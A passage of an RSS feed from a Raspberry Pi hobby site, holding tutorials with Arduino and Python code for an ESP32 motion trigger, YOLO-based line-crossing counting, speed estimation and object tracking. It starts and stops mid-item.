PIR sensor&lt;br&gt;2. When motion is detected, ESP32 sends a Wi-Fi message&lt;br&gt;3. Raspberry Pi receives the trigger&lt;br&gt;4. 
AI vision starts only on demand&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;ESP32 Arduino code (motion trigger)&lt;br&gt;&lt;br&gt;#include &amp;lt;WiFi.h&amp;gt;&lt;br&gt;&lt;br&gt;const char* ssid = "YOUR_WIFI";&lt;br&gt;const char* password = "YOUR_PASSWORD";&lt;br&gt;&lt;br&gt;const char* pi_ip = "192.168.1.100";&lt;br&gt;const int pi_port = 5000;&lt;br&gt;&lt;br&gt;int pirPin = 13;&lt;br&gt;&lt;br&gt;void setup() {&lt;br&gt;&amp;nbsp; pinMode(pirPin, INPUT);&lt;br&gt;&amp;nbsp; Serial.begin(115200);&lt;br&gt;&lt;br&gt;&amp;nbsp; WiFi.begin(ssid, password);&lt;br&gt;&amp;nbsp; while (WiFi.status() != WL_CONNECTED) {&lt;br&gt;&amp;nbsp; &amp;nbsp; delay(500);&lt;br&gt;&amp;nbsp; }&lt;br&gt;}&lt;br&gt;&lt;br&gt;void loop() {&lt;br&gt;&amp;nbsp; if (digitalRead(pirPin) == HIGH) {&lt;br&gt;&amp;nbsp; &amp;nbsp; WiFiClient client;&lt;br&gt;&amp;nbsp; &amp;nbsp; if (client.connect(pi_ip, pi_port)) {&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; client.println("MOTION");&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; client.stop();&lt;br&gt;&amp;nbsp; &amp;nbsp; }&lt;br&gt;&amp;nbsp; &amp;nbsp; delay(3000);&lt;br&gt;&amp;nbsp; }&lt;br&gt;}&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Raspberry Pi Python trigger listener&lt;br&gt;&lt;br&gt;import socket&lt;br&gt;import subprocess&lt;br&gt;&lt;br&gt;HOST = "0.0.0.0"&lt;br&gt;PORT = 5000&lt;br&gt;&lt;br&gt;sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br&gt;sock.bind((HOST, PORT))&lt;br&gt;sock.listen(1)&lt;br&gt;&lt;br&gt;print("Waiting for ESP32 trigger...")&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; conn, addr = sock.accept()&lt;br&gt;&amp;nbsp; &amp;nbsp; data = conn.recv(1024).decode().strip()&lt;br&gt;&amp;nbsp; &amp;nbsp; if data == "MOTION":&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Motion detected - starting AI vision")&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
subprocess.Popen(["python3", "ai_vision.py"])&lt;br&gt;&amp;nbsp; &amp;nbsp; conn.close()&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Raspberry Pi AI vision example (ai_vision.py)&lt;br&gt;&lt;br&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;for i in range(100):&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("AI Vision", frame)&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;How it works&lt;br&gt;&lt;br&gt;The ESP32 continuously monitors motion with very low power usage.&lt;br&gt;When motion is detected, it sends a simple trigger message to the Raspberry Pi.&lt;br&gt;The Raspberry Pi then activates AI vision for a limited time.&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Practical applications&lt;br&gt;&lt;br&gt;- Smart surveillance systems&lt;br&gt;- Wildlife monitoring&lt;br&gt;- Energy-efficient AI cameras&lt;br&gt;- Security triggers&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Limitations&lt;br&gt;&lt;br&gt;- Requires Wi-Fi connectivity&lt;br&gt;- PIR detects motion, not object type&lt;br&gt;- AI runtime duration must be managed&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Conclusion&lt;br&gt;&lt;br&gt;By combining ESP32 sensors with Raspberry Pi AI vision, efficient hybrid AI systems&lt;br&gt;can be built on affordable 
hardware.&lt;br&gt;&lt;br&gt;AI without millions is achieved through smart architecture, not expensive hardware.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/109/esp32-motion-sensor-trigger-%E2%86%92-raspberry-pi-ai-vision</guid>
<pubDate>Sun, 04 Jan 2026 22:00:20 +0000</pubDate>
</item>
<item>
<title>Line Crossing Counter with AI on Raspberry Pi (Entry / Exit Detection)</title>
<link>https://asky.uk/108/line-crossing-counter-with-raspberry-entry-exit-detection</link>
<description>&lt;p&gt;&lt;strong&gt;Line Crossing Counter with AI on Raspberry Pi&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Hardware: Raspberry Pi 4 / 5&lt;br&gt;AI type: Computer Vision – Object Detection&lt;/p&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;This project shows how a Raspberry Pi can count entries and exits using AI.&lt;br&gt;Objects are detected by a lightweight AI model and counted when they cross a virtual line.&lt;br&gt;Everything runs locally, without cloud services or GPUs.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;What you build&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;AI object detection on Raspberry Pi&lt;/li&gt;&lt;li&gt;Entry / exit counting using a virtual line&lt;/li&gt;&lt;li&gt;Fully offline processing&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Required hardware&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Raspberry Pi 4 or 5&lt;/li&gt;&lt;li&gt;Camera (Pi Camera or USB)&lt;/li&gt;&lt;li&gt;microSD card&lt;/li&gt;&lt;li&gt;Power supply&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Software&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Raspberry Pi OS&lt;/li&gt;&lt;li&gt;Python 3&lt;/li&gt;&lt;li&gt;OpenCV&lt;/li&gt;&lt;li&gt;Ultralytics YOLO&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Installation&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo apt update
sudo apt upgrade
sudo apt install python3-opencv python3-pip
pip3 install ultralytics&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Concept&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;A horizontal virtual line is placed in the video frame.&lt;br&gt;When an object’s center crosses the line, it is counted as entry or exit depending on direction.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Python code (copy-paste)&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;&lt;code&gt;import cv2
from ultralytics import YOLO

model = YOLO("yolov8n.pt")
cap = cv2.VideoCapture(0)

line_y = 240
prev_y = None
entries = 0
exits = 0

while True:
    ret, frame = cap.read()
    if not ret:
        break

    results = model(frame, verbose=False)
    boxes = results[0].boxes

    if len(boxes) &amp;gt; 0:
        x1, y1, x2, y2 = boxes[0].xyxy[0]
        cy = int((y1 + y2) / 2)

        if prev_y is not None:
            if prev_y &amp;lt; line_y and cy &amp;gt;= line_y:
                entries += 1
            elif prev_y &amp;gt; line_y and cy &amp;lt;= line_y:
                exits += 1

        prev_y = cy

    cv2.line(frame, (0, line_y), (frame.shape[1], line_y), (255, 0, 0), 2)
    cv2.putText(frame, f"Entries: {entries}", (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), 2)
    cv2.putText(frame, f"Exits: {exits}", (10, 60),
                cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 2)
    cv2.imshow("Line Counter", frame)

    if cv2.waitKey(1) &amp;amp; 0xFF == 27:
        break

cap.release()
cv2.destroyAllWindows()&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Applications&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;People entry/exit counting&lt;/li&gt;&lt;li&gt;Store traffic analysis&lt;/li&gt;&lt;li&gt;Simple access monitoring&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Limitations&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Works best with one main object&lt;/li&gt;&lt;li&gt;Occlusions reduce accuracy&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Raspberry Pi can perform practical AI analytics like entry and exit counting without expensive hardware.&lt;br&gt;This is a real, deployable AI use case on affordable devices.&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/108/line-crossing-counter-with-raspberry-entry-exit-detection</guid>
<pubDate>Sun, 21 Dec 2025 21:03:34 +0000</pubDate>
</item>
<item>
<title>Speed estimation with AI on Raspberry Pi</title>
<link>https://asky.uk/107/speed-estimation-with-ai-on-raspberry-pi</link>
<description>&lt;p data-start="374" data-end="473"&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br data-start="415" data-end="418"&gt;AI type: Computer Vision – Detection + Speed Estimation&lt;/p&gt;&lt;hr data-start="475" data-end="478"&gt;&lt;p data-start="480" data-end="488"&gt;Overview&lt;/p&gt;&lt;p data-start="490" data-end="705"&gt;This project shows how a Raspberry Pi can estimate the speed of moving objects using AI-based object detection and simple motion analysis.&lt;br data-start="628" data-end="631"&gt;The system runs fully offline and does not require GPUs or cloud services.&lt;/p&gt;&lt;p data-start="707" data-end="814"&gt;The goal is not absolute precision, but a practical and reproducible AI approach using affordable hardware.&lt;/p&gt;&lt;hr data-start="816" data-end="819"&gt;&lt;p data-start="821" data-end="840"&gt;What you will build&lt;/p&gt;&lt;ul data-start="842" data-end="1015"&gt;&lt;li data-start="842" data-end="887"&gt;&lt;p data-start="844" data-end="887"&gt;AI-based object detection on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li data-start="888" data-end="930"&gt;&lt;p data-start="890" data-end="930"&gt;Tracking object movement across frames&lt;/p&gt;&lt;/li&gt;&lt;li data-start="931" data-end="988"&gt;&lt;p data-start="933" data-end="988"&gt;Estimating object speed using pixel distance and time&lt;/p&gt;&lt;/li&gt;&lt;li data-start="989" data-end="1015"&gt;&lt;p data-start="991" data-end="1015"&gt;Fully local processing&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1017" data-end="1020"&gt;&lt;p data-start="1022" data-end="1039"&gt;Required hardware&lt;/p&gt;&lt;ul data-start="1041" data-end="1149"&gt;&lt;li data-start="1041" data-end="1077"&gt;&lt;p data-start="1043" data-end="1077"&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1078" data-end="1115"&gt;&lt;p data-start="1080" data-end="1115"&gt;Raspberry Pi Camera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1116" data-end="1132"&gt;&lt;p 
data-start="1118" data-end="1132"&gt;microSD card&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1133" data-end="1149"&gt;&lt;p data-start="1135" data-end="1149"&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1151" data-end="1154"&gt;&lt;p data-start="1156" data-end="1177"&gt;Software requirements&lt;/p&gt;&lt;ul data-start="1179" data-end="1263"&gt;&lt;li data-start="1179" data-end="1198"&gt;&lt;p data-start="1181" data-end="1198"&gt;Raspberry Pi OS&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1199" data-end="1211"&gt;&lt;p data-start="1201" data-end="1211"&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1212" data-end="1222"&gt;&lt;p data-start="1214" data-end="1222"&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1223" data-end="1263"&gt;&lt;p data-start="1225" data-end="1263"&gt;Ultralytics YOLO (lightweight model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1265" data-end="1268"&gt;&lt;p data-start="1270" data-end="1290"&gt;Project architecture&lt;/p&gt;&lt;ol data-start="1292" data-end="1438"&gt;&lt;li data-start="1292" data-end="1325"&gt;&lt;p data-start="1295" data-end="1325"&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1326" data-end="1355"&gt;&lt;p data-start="1329" data-end="1355"&gt;AI model detects objects&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1356" data-end="1389"&gt;&lt;p data-start="1359" data-end="1389"&gt;Object positions are tracked&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1390" data-end="1438"&gt;&lt;p data-start="1393" data-end="1438"&gt;Speed is calculated from movement over time&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr data-start="1440" data-end="1443"&gt;&lt;p data-start="1445" data-end="1463"&gt;Installation steps&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;Update system and install dependencies:&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;br&gt;sudo apt install python3-opencv python3-pip&lt;br&gt;pip3 install 
ultralytics&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p data-start="1626" data-end="1641"&gt;AI model choice&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;A lightweight YOLO Nano model is used for detection.&lt;br data-start="1695" data-end="1698"&gt;The model is pre-trained and used only for inference.&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;import time&lt;br&gt;import math&lt;br&gt;&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;prev_pos = None&lt;br&gt;prev_time = None&lt;br&gt;speed = 0&lt;br&gt;&lt;br&gt;PIXELS_PER_METER = 50&amp;nbsp; # calibration value&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; boxes = results[0].boxes&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if len(boxes) &amp;gt; 0:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x1, y1, x2, y2 = boxes[0].xyxy[0]&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cx = int((x1 + x2) / 2)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cy = int((y1 + y2) / 2)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; current_time = time.time()&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if prev_pos is not None:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dist_pixels = math.hypot(cx - prev_pos[0], cy - prev_pos[1])&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dist_meters = dist_pixels / PIXELS_PER_METER&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; dt = current_time - prev_time&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if dt &amp;gt; 0:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; speed = dist_meters / dt&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; prev_pos = (cx, cy)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; prev_time = current_time&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.putText(frame, f"Speed: {speed:.2f} m/s",&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (10, 30), cv2.FONT_HERSHEY_SIMPLEX,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1, (0, 255, 0), 2)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("AI Speed Estimation", frame)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;/p&gt;&lt;p data-start="2982" data-end="2994"&gt;How it works&lt;/p&gt;&lt;p data-start="2996" data-end="3232"&gt;The AI model detects an object and extracts its center position.&lt;br data-start="3060" data-end="3063"&gt;The distance between positions across frames is measured in pixels and converted to meters using a calibration factor.&lt;br data-start="3181" data-end="3184"&gt;Speed is calculated as distance divided by time.&lt;/p&gt;&lt;hr data-start="3234" data-end="3237"&gt;&lt;p data-start="3239" data-end="3255"&gt;Calibration note&lt;/p&gt;&lt;p data-start="3257" data-end="3385"&gt;The PIXELS_PER_METER value depends on camera position and scene scale.&lt;br data-start="3327" data-end="3330"&gt;It must be adjusted experimentally for better accuracy.&lt;/p&gt;&lt;hr data-start="3387" data-end="3390"&gt;&lt;p data-start="3392" data-end="3414"&gt;Practical applications&lt;/p&gt;&lt;ul data-start="3416" data-end="3527"&gt;&lt;li data-start="3416" data-end="3444"&gt;&lt;p data-start="3418" 
data-end="3444"&gt;Traffic speed monitoring&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3445" data-end="3470"&gt;&lt;p data-start="3447" data-end="3470"&gt;Robot motion analysis&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3471" data-end="3499"&gt;&lt;p data-start="3473" data-end="3499"&gt;Conveyor belt monitoring&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3500" data-end="3527"&gt;&lt;p data-start="3502" data-end="3527"&gt;Educational AI projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="3529" data-end="3532"&gt;&lt;p data-start="3534" data-end="3545"&gt;Limitations&lt;/p&gt;&lt;ul data-start="3547" data-end="3674"&gt;&lt;li data-start="3547" data-end="3579"&gt;&lt;p data-start="3549" data-end="3579"&gt;Approximate speed estimation&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3580" data-end="3625"&gt;&lt;p data-start="3582" data-end="3625"&gt;Sensitive to camera angle and calibration&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3626" data-end="3674"&gt;&lt;p data-start="3628" data-end="3674"&gt;Not suitable for high-precision measurements&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="3676" data-end="3679"&gt;&lt;p data-start="3681" data-end="3691"&gt;Conclusion&lt;/p&gt;&lt;p data-start="3693" data-end="3916"&gt;This project demonstrates that Raspberry Pi can perform meaningful AI-based speed estimation without GPUs or cloud services.&lt;br data-start="3817" data-end="3820"&gt;With lightweight models and simple math, affordable hardware can deliver practical AI solutions.&lt;/p&gt;&lt;p data-start="3918" data-end="3969"&gt;AI without millions remains an engineering reality.&lt;/p&gt;&lt;p data-start="1643" data-end="1751"&gt;&lt;img alt="" src="https://i.ytimg.com/vi/n2WT3Qb0SIU/maxresdefault.jpg" style="height:506px; width:900px"&gt;&lt;/p&gt;&lt;p data-start="1465" data-end="1504"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/107/speed-estimation-with-ai-on-raspberry-pi</guid>
<pubDate>Fri, 19 Dec 2025 07:22:17 +0000</pubDate>
</item>
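The speed formula in the item above reduces to pixel distance divided by the calibration factor and elapsed time. A minimal self-contained sketch of that arithmetic (the helper name speed_mps and the sample values are ours, not from the article):

```python
import math

PIXELS_PER_METER = 50.0  # calibration value, as in the article; scene-dependent

def speed_mps(prev_pos, cur_pos, dt):
    # pixel displacement between consecutive centroid positions
    dist_pixels = math.hypot(cur_pos[0] - prev_pos[0], cur_pos[1] - prev_pos[1])
    # convert pixels to meters, then divide by elapsed seconds
    return dist_pixels / PIXELS_PER_METER / dt

# 50 px of horizontal motion in 0.5 s at 50 px/m gives 2.0 m/s
print(speed_mps((100, 100), (150, 100), 0.5))  # prints 2.0
```

Re-measuring PIXELS_PER_METER whenever the camera is moved is what keeps the estimate meaningful.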
<item>
<title>Object Tracking and Unique Counting with AI on Raspberry Pi</title>
<link>https://asky.uk/106/object-tracking-and-unique-counting-with-ai-on-raspberry-pi</link>
<description>&lt;p&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br&gt;AI type: Computer Vision – Object Detection + Tracking&lt;/p&gt;&lt;p&gt;Overview&lt;/p&gt;&lt;p&gt;Simple object counting detects how many objects appear in a frame, but it cannot distinguish between new and already seen objects.&lt;br&gt;This project extends basic AI detection by adding object tracking, allowing the Raspberry Pi to count each object only once.&lt;/p&gt;&lt;p&gt;The result is a more practical AI system suitable for real-world scenarios such as people flow monitoring or vehicle counting.&lt;/p&gt;&lt;p&gt;What you will build&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;AI-based object detection on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Object tracking across video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Unique object counting (count once per object)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Fully local and offline system&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Required hardware&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi Camera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;microSD card&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Software requirements&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Ultralytics YOLO (lightweight model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Project architecture&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AI model detects objects in each frame&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Tracker assigns IDs to detected objects&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Each object ID is counted only once&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;This avoids double counting and improves 
accuracy.&lt;/p&gt;&lt;p&gt;Installation steps&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Update system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;/p&gt;&lt;ol start="2"&gt;&lt;li&gt;&lt;p&gt;Install dependencies&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt install python3-opencv python3-pip&lt;br&gt;pip3 install ultralytics&lt;/p&gt;&lt;ol start="3"&gt;&lt;li&gt;&lt;p&gt;Reboot the system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;AI model and tracking method&lt;/p&gt;&lt;p&gt;This project uses a lightweight YOLO model for detection and simple centroid-based tracking logic.&lt;br&gt;Each detected object is assigned an ID based on its position across frames.&lt;/p&gt;&lt;p&gt;This approach is computationally efficient and suitable for Raspberry Pi hardware.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;Python code (copy-paste)&lt;/p&gt;&lt;p&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;import math&lt;br&gt;&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;object_id = 0&lt;br&gt;objects = {}&lt;br&gt;counted_ids = set()&lt;br&gt;&lt;br&gt;def distance(p1, p2):&lt;br&gt;&amp;nbsp; &amp;nbsp; return math.hypot(p1[0] - p2[0], p1[1] - p2[1])&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; boxes = results[0].boxes&lt;br&gt;&amp;nbsp; &amp;nbsp; current_centroids = []&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; for box in boxes:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x1, y1, x2, y2 = box.xyxy[0]&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cx = int((x1 + x2) / 2)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cy = int((y1 + y2) / 2)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; current_centroids.append((cx, cy))&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; for centroid in current_centroids:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; matched = False&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; for oid, prev in objects.items():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if distance(centroid, prev) &amp;lt; 50:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; objects[oid] = centroid&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; matched = True&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if not matched:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; objects[object_id] = centroid&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; counted_ids.add(object_id)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; object_id += 1&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; for oid, (cx, cy) in objects.items():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.putText(frame, f"ID {oid}", (cx + 5, cy + 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 1)&lt;br&gt;&lt;br&gt;&amp;nbsp; 